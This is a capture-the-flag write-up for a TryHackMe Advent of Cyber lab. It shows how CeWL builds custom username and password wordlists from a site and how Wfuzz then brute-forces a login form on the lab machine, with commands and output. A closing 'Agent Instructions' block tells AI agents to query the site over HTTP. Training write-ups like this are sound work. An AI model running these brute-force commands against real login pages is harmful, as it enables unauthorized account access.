# Day 4
**Learning Objectives**
* What is CeWL?
* What are the capabilities of CeWL?
* How can we leverage CeWL to generate a custom wordlist from a website?
* How can we customise the tool's output for specific tasks?
The room is a very straightforward introduction to the tool with all the commands given.
CeWL is a wordlist generator that is unique compared to other tools available. While many tools rely on pre-defined lists or common dictionary attacks, CeWL creates custom wordlists based on web page content.
We start with making a basic wordlist from the website and output it into a file
```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl http://10.10.126.196 -w output.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
```
The contents of the file is a world list as follows.
```
└─$ cat output.txt
Start
End
and
the
AntarctiCrafts
our
Stylesheet
.
.
.
Visit
office
Send
Message
Login
Submit
```
CeWL provides a lot of options that allow you to tailor the wordlist to your needs:
1. Specify spidering depth: The `-d` option allows you to set how deep CeWL should spider. For example, to spider two links deep: `cewl http://machine_ip -d 2 -w output1.txt`
2. Set minimum and maximum word length: Use the `-m` and `-x` options respectively. For instance, to get words between 5 and 10 characters: `cewl http://machine_ip -m 5 -x 10 -w output2.txt`
3. Handle authentication: If the target site is behind a login, you can use the `-a` flag for form-based authentication.
4. Custom extensions: The `--with-numbers` option will append numbers to words, and using `--extension` allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.
5. Follow external links: By default, CeWL doesn't spider external sites, but using the `--offsite` option allows you to do so.
For this room we need to gain access to the portal located at `http://machine_ip/login.php`
We first create a username and password list based on the website.
Username List:
{% code overflow="wrap" %}
```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 0 -m 5 -w usernames.txt http://10.10.126.196/team.php --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat usernames.txt
antarcticrafts
stylesheet
start
members
officer
.
.
.
links
rights
reserved
```
{% endcode %}
Password List:
```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 2 -m 5 -w passwords.txt http://10.10.126.196 --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat passwords.txt
Start
AntarctiCrafts
Stylesheet
About
.
.
.
Message
Login
Submit
```
No we can attempt to brute force the login page with Wfuzz.
Wfuzz is a tool designed for brute-forcing web applications. It can be used to find resources not linked directories, servlets, scripts, etc, brute-force GET and POST parameters for checking different kinds of injections (SQL, XSS, LDAP), brute-force forms parameters (user/password) and fuzzing.
{% code overflow="wrap" %}
```
┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.126.196/login.php -d "username=FUZZ&password=FUZ2Z"
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.126.196/login.php
Total requests: 9361
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000006317: 302 118 L 297 W 4442 Ch "[REDACTED] - [REDACTED]"
Total time: 0
Processed Requests: 9361
Filtered Requests: 9360
Requests/sec.: 0
```
{% endcode %}
We now have our username and password. We can proceed to login to the portal.
We can see this is a mailbox and the flag can be found here.
***
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://bunring.gitbook.io/ctf-writeups/try-hack-me/advent-of-cyber-2023/day-4.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.